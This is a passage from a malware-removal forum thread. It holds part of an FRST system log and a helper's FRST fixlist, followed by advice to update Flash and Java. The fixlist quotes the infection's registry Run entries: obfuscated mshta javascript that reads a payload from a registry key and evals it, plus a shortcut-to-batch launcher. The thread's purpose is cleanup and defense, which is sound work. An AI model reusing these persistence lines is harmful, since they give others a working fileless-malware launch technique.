MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{A79DD511-2162-4E17-84DC-E427C7089D6F}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{927A5DA9-3912-4C00-993F-5E7E7D2E378C}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{C91EBF51-63D3-487A-A5C4-4AA7ECAA3F63}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{12BE54D9-D811-4084-B305-9C0CDDE91A9E}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{0221E735-4049-4942-B8A0-C1023385A22A}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{EFC291DC-7AA8-46EF-9D8C-86542FBA9448}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{FA416475-07C3-4377-AD2B-158E3ECF4CC9}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe

==================== Restore Points =========================

18-11-2016 15:31:55 Malwarebytes Anti-Rootkit Restore Point

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/18/2016 07:41:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 07:17:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 06:06:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 03:41:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 12:16:01 PM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 08:41:59 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 07:07:59 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 05:19:00 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 03:58:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CompatTelRunner.exe, version: 10.0.14913.1002, time stamp: 0x57d1070d
Faulting module name: devinv.dll, version: 10.0.14913.1002, time stamp: 0x57d10950
Exception code: 0xc0000005
Fault offset: 0x0000000000023c00
Faulting process id: 0x71a4
Faulting application start time: 0x01d2417610386c0f
Faulting application path: C:\Windows\system32\CompatTelRunner.exe
Faulting module path: C:\Windows\system32\devinv.dll
Report Id: 1e77d167-ad6d-11e6-a646-001e8cf5a0bc

Error: (11/18/2016 03:27:59 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".


System errors:
=============
Error: (11/19/2016 04:11:41 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:51:04 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:39:06 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:37:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:33:31 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:15:09 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 03:10:14 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/19/2016 02:55:18 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 02:54:16 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/19/2016 02:38:12 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.


CodeIntegrity:
===================================
  Date: 2016-11-01 13:28:46.075
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-11-01 13:28:46.012
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-11-01 13:28:45.950
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-11-01 13:28:45.887
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.508
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.446
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.399
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-05-26 11:17:53.337
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-09-18 10:50:59.242
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-09-18 10:50:59.210
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel® Core™ i5-2320 CPU @ 3.00GHz
Percentage of memory in use: 43%
Total physical RAM: 8161.36 MB
Available physical RAM: 4612.8 MB
Total Virtual: 16320.89 MB
Available Virtual: 12915.57 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:392.05 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 158191E4)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


Edited by Chris Cosgrove, 19 November 2016 - 06:05 PM.
Moved from 'Am I infected?' to 'Virus, trojan, etc. logs'


#3 nasdaq

nasdaq

  • Malware Response Team
  • 38,576 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:41 PM

Posted 20 November 2016 - 10:37 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:


HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**wqgzvwnow<*>] => "C:\Users\cjerald\AppData\Local\322148\4c5510.lnk" <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFFPlgn => not found
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (Avast Online Security) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-13]
CHR Extension: (Chrome Media Router) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-01]
S4 LMIRfsClientNP; no ImagePath
S3 aswVmm; \??\C:\Users\cjerald\AppData\Local\Temp\aswVmm.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat ()
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd: "C:\Windows\system32\mshta.exe" "javascript:iPH9j5="V15iBXVx";s12d=new ActiveXObject("WScript.Shell");M40aWd="cEsTuKN";TtXA7=s12d.RegRead("HKCU\\software\\auux\\onnlw");FU76Gv="LccebV4j";eval(TtXA7);Br6Aj="O1GiJK";" <===== ATTENTION
C:\Users\cjerald\AppData\Local\322148

reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===


Your version(s) of Adobe Flash are out-or-date and vulnerable.
Go to Start > Control Panel > Programs and Features and uninstall the following programs:
XXXAdobe Flash Player 16 ActiveX
Adobe Flash Player 19 NPAPIXXX


Go to this page with Firefox to download the current version for your browser:
https://get.adobe.com/flashplayer/

Note:
Flash Player is pre-installed in Google Chrome and updates automatically!
Flash Player is pre-installed in IE/Hedge and updates automatically!

If still present after the update you can remove the old version(s) of Java via the Control Panel > Programs and Features.
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old version(s) of Java via the Control Panel > Programs and Features.
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)

Please post the Fixlog.txt and let me know what problem persists.

#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,576 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:08:41 PM

Posted 26 November 2016 - 09:52 AM

Are you still with me?




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users